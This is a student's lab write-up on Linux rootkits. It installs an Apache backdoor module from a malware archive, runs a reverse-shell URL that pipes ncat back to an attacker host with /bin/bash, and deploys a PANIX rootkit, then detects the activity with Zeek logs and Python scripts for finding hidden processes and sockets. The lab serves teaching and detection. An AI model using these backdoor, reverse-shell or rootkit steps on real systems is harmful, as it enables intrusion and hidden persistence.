SEC 440 Linux Rootkits - JadenGil/Jaden-Tech-Journal GitHub Wiki

Installing Apache RootKit on Ubuntu:

On my Xubuntu machine (the target web server), run the following commands in a terminal emulator:

sudo apt update

sudo apt install apache2 apache2-dev apache2-utils ncat

cd /tmp

wget -c https://github.com/vxunderground/MalwareSourceCode/blob/main/Linux/Rootkits/Rootkit.Linux.Apache-rootkit.7z

7z e Rootkit.Linux.Apache-rootkit.7z

NOTE: A GitHub /blob/ URL serves the HTML page for the file, not the file itself. If 7z reports that the download is not an archive, fetch the raw file instead (replace /blob/ with /raw/ in the URL). The 7z command comes from the p7zip-full package (sudo apt install p7zip-full), and vx-underground archives are password-protected; the password is infected.

sudo apxs -c -i mod_authg.c

Output from sudo apt install apache2 apache2-dev apache2-utils ncat:

image

Contents of /tmp after installation:

image

Output after running wget -c https://github.com/vxunderground/MalwareSourceCode/blob/main/Linux/Rootkits/Rootkit.Linux.Apache-rootkit.7z:

image

Output after 7z e Rootkit.Linux.Apache-rootkit.7z:

image

Output after running sudo apxs -c -i mod_authg.c:

image

Added the following to the end of the apache2.conf file (apxs -c -i compiles mod_authg.c and copies mod_authg.so into Apache's modules directory, but it does not enable the module, so it has to be loaded from the config by hand):

image

Now restart Apache (sudo systemctl restart apache2) and run the command lynx -mime_header http://localhost/authg?c=id . If the module is loaded, the response body contains the output of id running as the Apache user.

NOTE: You may need to install Lynx with sudo apt install lynx

Deliverable 1:

image

Now, from the Kali box, we can confirm the backdoor is reachable over the network with the command in this screenshot:

image


Shell access w/ Apache backdoor:

On the kali box, start a listener:

nc -vnlp 5555

Then request the following URL on the Ubuntu box from a browser or curl. The value of the c parameter is run as a shell command on the server, so the pipe into ncat makes Apache connect back to the listener with /bin/bash attached (a reverse shell):

http://ubuntu-ip-address/authg?c=/bin/sh|%20ncat%20kali-ip-address%205555%20-e%20/bin/bash

Initial output:

image

You can see in that image that the listener has received a connection back from the web server: the ncat launched through the backdoor connected to Kali on port 5555, and the commands typed into the listener run on the Ubuntu box.

Deliverable 2:

image


Time for Zeek

Deliverable 3:

image

image

The first screenshot (http.log) points to command injection over HTTP, because the following fields show:

Source (id.orig_h & id.orig_p): 192.168.1.10:43250 is the client that initiated the request.

Destination (id.resp_h & id.resp_p): 192.168.1.20:80 is the server that responded.

HTTP Method (method): GET is used to request a resource; here the "resource" is the backdoor handler.

URI (uri): /authg?c=/bin/sh|ncat shows a shell pipeline in the query string that launches ncat, i.e. an attempt to execute a command on the server rather than fetch a file.

Status Code (status_code): 200 confirms the server accepted and processed the request rather than rejecting it.

In the second screenshot (conn.log), the rejected and reset TCP connections (conn_state values such as REJ and RSTO) suggest scanning or probing behavior, potentially a reconnaissance phase.
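The checks above can be scripted against Zeek's TSV logs. The following Python is an added example and not part of the lab: the http.log and conn.log excerpts in it are constructed (same 192.168.1.10 / 192.168.1.20 hosts as the screenshots, made-up uids and timestamps), and the flagging rules (shell metacharacters, tool names and absolute binary paths in the URL-decoded query string; a per-source count of REJ/RSTO-style conn_state values) are this example's own choices, not Zeek built-ins.

```python
"""Triage Zeek http.log and conn.log for the /authg backdoor traffic.

Added example, not part of the lab write-up. The log excerpts below are
constructed in Zeek's default TSV layout (one #fields header, tab-separated
records) so the script runs offline; the IPs mirror the lab's screenshots.
"""
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed http.log: a normal page load, the reverse-shell call, and c=id.
HTTP_LOG = "\n".join([
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tmethod\turi\tstatus_code",
    "1700000000.1\tC1\t192.168.1.10\t43249\t192.168.1.20\t80\tGET\t/index.html\t200",
    "1700000001.2\tC2\t192.168.1.10\t43250\t192.168.1.20\t80\tGET\t"
    "/authg?c=/bin/sh|%20ncat%20192.168.1.10%205555%20-e%20/bin/bash\t200",
    "1700000002.3\tC3\t192.168.1.10\t43251\t192.168.1.20\t80\tGET\t/authg?c=id\t200",
])

# Constructed conn.log: several failed/reset sessions from one host, one good one.
CONN_LOG = "\n".join([
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tconn_state",
    "1700000003.0\tC4\t192.168.1.10\t50001\t192.168.1.20\t22\ttcp\tREJ",
    "1700000003.1\tC5\t192.168.1.10\t50002\t192.168.1.20\t23\ttcp\tREJ",
    "1700000003.2\tC6\t192.168.1.10\t50003\t192.168.1.20\t443\ttcp\tRSTO",
    "1700000003.3\tC7\t192.168.1.10\t50004\t192.168.1.20\t8080\ttcp\tREJ",
    "1700000004.0\tC8\t192.168.1.30\t40000\t192.168.1.20\t80\ttcp\tSF",
])

# Zeek conn_state values meaning the handshake never became a usable session.
FAILED_STATES = {"S0", "REJ", "RSTO", "RSTR", "RSTOS0", "RSTRH"}

METACHARS = re.compile(r"[|;&`$]")
TOOLS = re.compile(r"\b(?:nc|ncat|netcat|bash|sh|curl|wget|python\d?|perl)\b")
BIN_PATH = re.compile(r"/(?:usr/)?s?bin/\w+")


def parse_zeek_tsv(text):
    """Return a list of dicts keyed by the #fields header; other # lines are skipped."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def suspicious_http(rows):
    """Flag requests whose URL-decoded query string looks like a shell command."""
    hits = []
    for r in rows:
        query = unquote(urlsplit(r["uri"]).query)
        reasons = []
        if METACHARS.search(query):
            reasons.append("shell_metachar")
        if TOOLS.search(query):
            reasons.append("tool_name")
        if BIN_PATH.search(query):
            reasons.append("abs_binary_path")
        if reasons:
            hits.append({"uid": r["uid"], "src": f'{r["id.orig_h"]}:{r["id.orig_p"]}',
                         "decoded": query, "reasons": reasons})
    return hits


def probable_scanners(rows, min_failed=3):
    """Count failed/reset TCP sessions per source; a burst of them points at probing."""
    failed = Counter(r["id.orig_h"] for r in rows
                     if r["proto"] == "tcp" and r["conn_state"] in FAILED_STATES)
    return {host: n for host, n in failed.items() if n >= min_failed}


if __name__ == "__main__":
    for h in suspicious_http(parse_zeek_tsv(HTTP_LOG)):
        print(h["uid"], h["src"], h["reasons"], h["decoded"])
    print(probable_scanners(parse_zeek_tsv(CONN_LOG)))
```

Note that the plain c=id request is not flagged by any of these rules: a generic metacharacter rule catches the reverse shell but not a bare command name, which is why knowing that /authg is not a legitimate path on the server matters more than the pattern match. To run this against real logs, feed the contents of http.log and conn.log to parse_zeek_tsv instead of the constructed strings.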


Installing panix:

We can download panix with the following command: curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -o panix.sh

We also need to make the script executable with chmod +x panix.sh

image

We can use panix to deploy a rootkit with the command sudo ./panix.sh --rootkit --secret "P4N1X" --identifier "panix"

Deliverable 4:

image

image


Hiding Process with Panix:

Deliverable 5:

image


Finding hidden processes:

Deliverable 6:

image

Deliverable 7:

image

Deliverable 8:

By using the command ls -l /proc/8650/fd/* | grep 4444 we get the file descriptors of PID 8650; socket descriptors show up as symlinks to socket:[INODE], so this is where the inode # for the socket comes from. Note that these entries carry the inode but not the port: grep 4444 only matches if the inode number itself happens to contain 4444. To tie an inode to a port, look the inode up in /proc/net/tcp (inode column; the port is the hex part of local_address, 4444 = 0x115C), or use ss -tlnpe, which prints ino: next to each listener.
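To go from the ls -l /proc/PID/fd output to a port, and to find a PID that ps no longer shows, the following Python is an added example (not the lab's own commands) covering the hidden-process and socket deliverables above. The /proc/net/tcp excerpt in it is constructed so the inode-to-port decoding can be checked offline; the PID-probing and fd-walking functions read the live /proc of whatever host runs the script, and the PID 8650 / port 4444 values are taken from this write-up.

```python
"""Locate a PID hidden from ps and tie its socket to a listening port.

Added example for the 'Finding hidden processes' deliverables, not the lab's
own commands. Two techniques are combined:
  1. Process-hiding hooks normally filter readdir() on /proc. Opening
     /proc/<pid>/status by name is a different code path, so a PID that opens
     but is missing from os.listdir('/proc') is hidden. Tgid is checked
     because non-leader threads are also reachable by name.
  2. /proc/<pid>/fd/N -> 'socket:[INODE]' never shows a port. /proc/net/tcp
     maps that inode to local_address in hex (little-endian IPv4, port in
     hex; 4444 == 0x115C). SAMPLE_PROC_NET_TCP below is constructed data.
"""
import os

TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV",
              "04": "FIN_WAIT1", "05": "FIN_WAIT2", "06": "TIME_WAIT",
              "07": "CLOSE", "08": "CLOSE_WAIT", "09": "LAST_ACK",
              "0A": "LISTEN", "0B": "CLOSING"}

# Constructed /proc/net/tcp excerpt: a listener on 0.0.0.0:4444 (inode 44444)
# and one on 127.0.0.1:80 (inode 18421).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 44444 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18421 1 0000000000000000 100 0 0 10 0
"""


def decode_addr(hexaddr):
    """'0100007F:0050' -> ('127.0.0.1', 80)."""
    ip_hex, port_hex = hexaddr.split(":")
    octets = [int(ip_hex[i:i + 2], 16) for i in (6, 4, 2, 0)]
    return ".".join(map(str, octets)), int(port_hex, 16)


def sockets_by_inode(proc_net_tcp_text):
    """Map socket inode -> (local_ip, local_port, state) from /proc/net/tcp text."""
    table = {}
    for line in proc_net_tcp_text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 10:
            continue
        ip, port = decode_addr(parts[1])
        table[int(parts[9])] = (ip, port, TCP_STATES.get(parts[3], parts[3]))
    return table


def inodes_listening_on(table, port):
    """Inodes of LISTEN sockets bound to the given port."""
    return sorted(ino for ino, (_, p, st) in table.items()
                  if p == port and st == "LISTEN")


def visible_pids():
    """What ps and ls /proc see: the readdir() view of /proc."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}


def probed_pids(pid_max=None):
    """Thread-group leaders reachable by name as /proc/<pid>/status, 1..pid_max.
    A full pid_max (up to 4194304) takes a while; pass a smaller bound to sample."""
    if pid_max is None:
        with open("/proc/sys/kernel/pid_max") as f:
            pid_max = int(f.read())
    alive = set()
    for pid in range(1, pid_max + 1):
        try:
            with open(f"/proc/{pid}/status") as f:
                tgid = next(int(l.split()[1]) for l in f if l.startswith("Tgid:"))
        except (OSError, StopIteration):
            continue
        if tgid == pid:
            alive.add(pid)
    return alive


def hidden_pids(visible, probed):
    """PIDs that answer by name but are absent from the directory listing."""
    return sorted(probed - visible)


def pids_holding_inode(inode, pids):
    """PIDs with an fd symlink to socket:[inode] (the ls -l /proc/PID/fd step)."""
    target = f"socket:[{inode}]"
    owners = []
    for pid in pids:
        try:
            if any(os.readlink(f"/proc/{pid}/fd/{fd}") == target
                   for fd in os.listdir(f"/proc/{pid}/fd")):
                owners.append(pid)
        except OSError:  # process exited, fd closed mid-walk, or fd dir not ours
            continue
    return sorted(owners)


if __name__ == "__main__":
    with open("/proc/net/tcp") as f:
        live = sockets_by_inode(f.read())
    seen = visible_pids()
    hidden = hidden_pids(seen, probed_pids())
    print("hidden PIDs:", hidden or "none")
    for ino in inodes_listening_on(live, 4444):
        print(f"socket inode {ino} on :4444 held by PIDs",
              pids_holding_inode(ino, seen | set(hidden)))
```

Run it as root so other users' fd directories are readable. The probe only defeats hooks that filter directory listings; a kernel rootkit that also intercepts path lookup under /proc would hide from it too, so cross-check against the network side (Zeek's conn.log, or a port scan of the host from Kali) rather than trusting any single view of the box.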


Reflection:

While this lab didn't take very long, it was definitely a little frustrating. I had a really hard time at the end finding the socket information despite reading through the mailing list provided in the lab. I am not entirely sure why this particularly stumped me, but after some more research outside of the email chain I was able to figure out that the command ls -l /proc/8650/fd/* | grep 4444 was what I was looking for.